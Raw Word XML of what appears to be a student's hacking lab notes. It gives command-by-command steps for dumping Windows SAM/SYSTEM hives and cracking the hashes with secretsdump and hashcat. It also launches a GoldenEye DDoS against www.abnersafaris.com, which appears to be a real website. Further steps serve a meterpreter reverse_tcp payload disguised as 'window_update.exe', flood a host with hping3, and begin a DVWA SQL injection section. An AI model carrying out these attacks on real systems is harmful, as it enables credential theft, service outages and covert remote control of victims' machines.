      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve">  A KALI LINUX MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72081B48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Reg save HKLM\SAM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>sam.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C0B989C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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>Sam.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve">  “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> contains all the local </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> passwords”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA7177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Reg save HKLM\SYSTEM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>system.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="740F9F12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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>System.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>contains  the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> boot key (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>syskey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>) used to encrypt the SAM file”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16566243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</w:p>
    <w:p w14:paraId="0B046D66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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AC0C488" wp14:editId="60406F18">
            <wp:extent cx="5899150" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="13252340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" t="38630" b="1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5995A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User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>kevin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> is added to the computer management and stored </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A38ED7B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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F2D5D2" wp14:editId="5901948E">
            <wp:extent cx="3822700" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="9049272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7514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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>Sam.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>system.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> files are then </w:t>
      </w:r>
      <w:r>
        <w:t>sent</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> to kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> saved to Desktop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC76199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</w:p>
    <w:p w14:paraId="74F8028C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</w:p>
    <w:p w14:paraId="69869823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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CACFF6D" wp14:editId="03CFCB66">
            <wp:extent cx="5734050" cy="1816100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3273035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6A7A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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>impacket-secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>sam.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>system.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450CBC83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Extracts password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A8C08A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55BAB084" wp14:editId="157DB732">
            <wp:extent cx="5727700" cy="1657350"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="17568919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2488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#nano hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79594A4C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Copy and pest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>kevin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> hashes in “hashes .txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71843E17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#cat hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794EFB8D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Display the hashes in hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66155285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#nano password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0BB3B9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Put the possible passwords in the list </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFAA043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#nano password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3254C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>Display all the password in “password.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441AB14C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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41EE64BA" wp14:editId="6930F040">
            <wp:extent cx="4476750" cy="2840728"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="304807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15" cy="28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7E89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#Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> -m 1000 hashes.txt password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D32403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t xml:space="preserve">It actively cracks the password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>hashes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> and the password is “12345” for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>kevin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19638E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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65E5353A" wp14:editId="2537DA99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292600" cy="3420110"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1833679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279">
        <w:t>7a21990fcd3d759941e45c490f143d5f:12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420CF79B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00AE0279" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE027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C9E1F7" wp14:editId="2B5B50A1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093335" cy="4104640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1495701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68" cy="410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3D7EB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0AFF0759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lastRenderedPageBreak/>
        <w:t>DDOS ATTACK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoldenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9A4EA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git clone </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the goldeneye repo from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76C89F10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#cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>GoldenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B24F9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To </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>change  working</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> directory to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>GoldenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A16172F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>#chmod 777 goldeneye</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C843EC9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>Full read, write and execute permissions on file or folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869A79E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#python3 goldeneye.py </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="002F5F86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>abnersafaris.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> -w 50 -s 50 -m get </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08504952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Launching a DDOS ATTACK against that web site </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B197814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  <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00300C3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B0AA6F8" wp14:editId="52B44B1D">
            <wp:extent cx="5946775" cy="3982720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6701846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4DF6" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515BC722" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F34B6D" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Windows Hacking </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metersploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38A179E7" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="006D0C88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69B27B43" wp14:editId="7F2FB079">
            <wp:extent cx="5893103" cy="1435174"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7748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84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5C93" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"># in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78C23C14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 xml:space="preserve"> &gt; cp </w:t>
      </w:r>
      <w:r>
        <w:t>window_update.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> /var/www/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>html ,”this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> moves file to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>whe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> web so that it can be download to the target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>machine ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E87D2CF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 xml:space="preserve"> &gt;exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAF3FAB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>&gt; set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D2A4F40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 xml:space="preserve"> &gt;set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>192.168.1.153 ”set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">  the local address of the attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>machine  ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B2F12B4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 xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>seyt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> LPORT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>4444  “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">to set the local port of the attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>machine ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57ED7608" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>run  “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">to start the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>exploit ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BD5E773" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63920AD1" wp14:editId="69062236">
            <wp:extent cx="5727700" cy="4102100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="4944995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F8BF" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">Meterpreter &gt; help “to show more options that can be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>exploited ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3A7FACA6" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="4F0F4069" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="1726C966" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="46090BF2" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="641C1E1A" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="25BBA776" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="2B140F71" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t>Meterpreter &gt; screenshot “to take screenshot from the target machine”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA13705" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">Meterpreter &gt;screenshare “to share the screen of the target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>machine ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32C893E8" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="53DF03FF" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D926AA6" wp14:editId="7512546B">
            <wp:extent cx="5727700" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="4949991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29E0" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="4DB840DA" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="309CDA2A" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B3D7F49" wp14:editId="6148FB72">
            <wp:extent cx="5727700" cy="3422650"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="10572381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577A" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="66AA8B1B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="37A775F5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2E65081B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DOS ATTACK (hping3 method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F4ADF3" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">#hping3 -c 1000 -d 120 -P </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>4444  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">  -flood 192.168.1.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C241AE" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">-c </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>10000  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>number of packets to be sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E9A88" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">-d </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>120 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> size of each </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>packets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> sent to target machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345B49F2" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t>4444 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve"> destination ports to receive the packets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D308A07" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00300C3A" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00300C3A">
        <w:t xml:space="preserve">-- flood sending packets as fast as possible  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C0277" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="4567537D" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="006A1F61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47E31BC8" wp14:editId="6EAD998D">
            <wp:extent cx="5946775" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15641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43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CE75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5BCF357F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37441E8E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00E52B80" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E52B80">
        <w:t>SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B550A1F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Go to the SQL Injection page in DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18722D9E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>Navigate to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CBE84" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
